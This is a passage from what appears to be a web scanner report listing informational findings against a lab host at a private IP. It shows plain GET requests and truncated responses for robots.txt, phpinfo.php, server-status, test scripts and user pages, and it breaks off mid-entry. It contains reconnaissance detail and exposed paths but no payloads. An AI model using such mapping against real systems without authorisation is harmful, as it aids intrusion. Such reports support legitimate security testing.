HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:44 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1761
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Notice</b>: Undefined index: f in <b>/var/www/html/contactus.php</b> on line <b>7</b><br />
<br />
<b>Warning</b>: file_get_contents(): Filename cannot be empty in <b>/var/www/html/contact
...[SNIP]...
3.10.6. http://10.250.200.5:81/css/style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /css/style.css

Request 1

GET /css/style.css HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/user/stephi.fonda/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:47:54 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 0
Connection: close
Content-Type: inode/x-empty

3.10.7. http://10.250.200.5:81/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /login

Request 1

GET /login HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:59 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 882
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title></title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="/css/style.css" rel="st
...[SNIP]...
3.10.8. http://10.250.200.5:81/phpinfo.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /phpinfo.php

Request 1

GET /phpinfo.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:06 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
3.10.9. http://10.250.200.5:81/phpinfo.php/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /phpinfo.php/

Request 1

GET /phpinfo.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:15 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
3.10.10. http://10.250.200.5:81/register

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /register

Request 1

GET /register HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:16 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2292
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
   <title></title>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link href="/css/style.css" rel="stylesheet">
<
...[SNIP]...
3.10.11. http://10.250.200.5:81/robots.txt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /robots.txt

Request 1

GET /robots.txt HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:48:28 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 190
Connection: close
Content-Type: text/plain;charset=UTF-8

User-agent: *
Disallow: /user/
Disallow: /search
Disallow: /config.php
Disallow: /phpinfo.php
Disallow: /session.php
Disallow: /sys-test.php
Disallow: /sys2_test.php
Disallow: /server-status
3.10.12. http://10.250.200.5:81/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /search

Request 1

GET /search HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:48:29 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 996
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 style="text-align: center;">
           <span style="font-family:tahoma,geneva,sans-
...[SNIP]...
3.10.13. http://10.250.200.5:81/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /search/

Request 1

GET /search/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:49:07 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 996
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 style="text-align: center;">
           <span style="font-family:tahoma,geneva,sans-
...[SNIP]...
3.10.14. http://10.250.200.5:81/search/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /search/search

Request 1

GET /search/search HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:49:07 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 996
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 style="text-align: center;">
           <span style="font-family:tahoma,geneva,sans-
...[SNIP]...
3.10.15. http://10.250.200.5:81/server-status

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /server-status

Request 1

GET /server-status HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:51:37 GMT
Server: Apache/2.4.10 (Debian)
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7411
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for 10.250.200.5 (via 172.18.0.6)</h1>

<dl><dt>Server Version:
...[SNIP]...
3.10.16. http://10.250.200.5:81/server-status/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /server-status/

Request 1

GET /server-status/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:02 GMT
Server: Apache/2.4.10 (Debian)
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7404
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for 10.250.200.5 (via 172.18.0.6)</h1>

<dl><dt>Server Version:
...[SNIP]...
3.10.17. http://10.250.200.5:81/session.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /session.php

Request 1

GET /session.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:05 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 13
Connection: close
Content-Type: text/html; charset=UTF-8

array(0) {
}
3.10.18. http://10.250.200.5:81/session.php/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /session.php/

Request 1

GET /session.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:10 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 13
Connection: close
Content-Type: text/html; charset=UTF-8

array(0) {
}
3.10.19. http://10.250.200.5:81/sys-test.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /sys-test.php

Request 1

GET /sys-test.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:15 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 110
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Notice</b>: Undefined index: test in <b>/var/www/html/sys-test.php</b> on line <b>2</b><br />
</br>
3.10.20. http://10.250.200.5:81/sys-test.php/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /sys-test.php/

Request 1

GET /sys-test.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:25 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 110
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Notice</b>: Undefined index: test in <b>/var/www/html/sys-test.php</b> on line <b>2</b><br />
</br>
3.10.21. http://10.250.200.5:81/sys2_test.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /sys2_test.php

Request 1

GET /sys2_test.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:13 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7020
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
3.10.22. http://10.250.200.5:81/sys2_test.php/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /sys2_test.php/

Request 1

GET /sys2_test.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:17 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7020
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
3.10.23. http://10.250.200.5:81/user/jyoti.ermine

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine

Request 1

GET /user/jyoti.ermine HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:56:10 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1345
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>jyoti.ermine -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<lin
...[SNIP]...
3.10.24. http://10.250.200.5:81/user/jyoti.ermine/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine/

Request 1

GET /user/jyoti.ermine/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:17 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1345
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>jyoti.ermine -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<lin
...[SNIP]...
3.10.25. http://10.250.200.5:81/user/jyoti.ermine/key.asc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine/key.asc

Request 1

GET /user/jyoti.ermine/key.asc HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:25 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 50
Connection: close
Content-Type: text/html; charset=UTF-8

gpgkeys: key FA46950C not found on keyserver<br/>
3.10.26. http://10.250.200.5:81/user/jyoti.ermine/me.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine/me.jpg

Request 1

GET /user/jyoti.ermine/me.jpg HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:44 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 0
Connection: close
Content-Type: image/jpeg

3.10.27. http://10.250.200.5:81/user/marge.aphrodite

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite

Request 1

GET /user/marge.aphrodite HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:06:43 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1364
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>marge.aphrodite -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<
...[SNIP]...
3.10.28. http://10.250.200.5:81/user/marge.aphrodite/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite/

Request 1

GET /user/marge.aphrodite/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:56:17 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1364
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>marge.aphrodite -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<
...[SNIP]...
3.10.29. http://10.250.200.5:81/user/marge.aphrodite/key.asc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite/key.asc

Request 1

GET /user/marge.aphrodite/key.asc HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
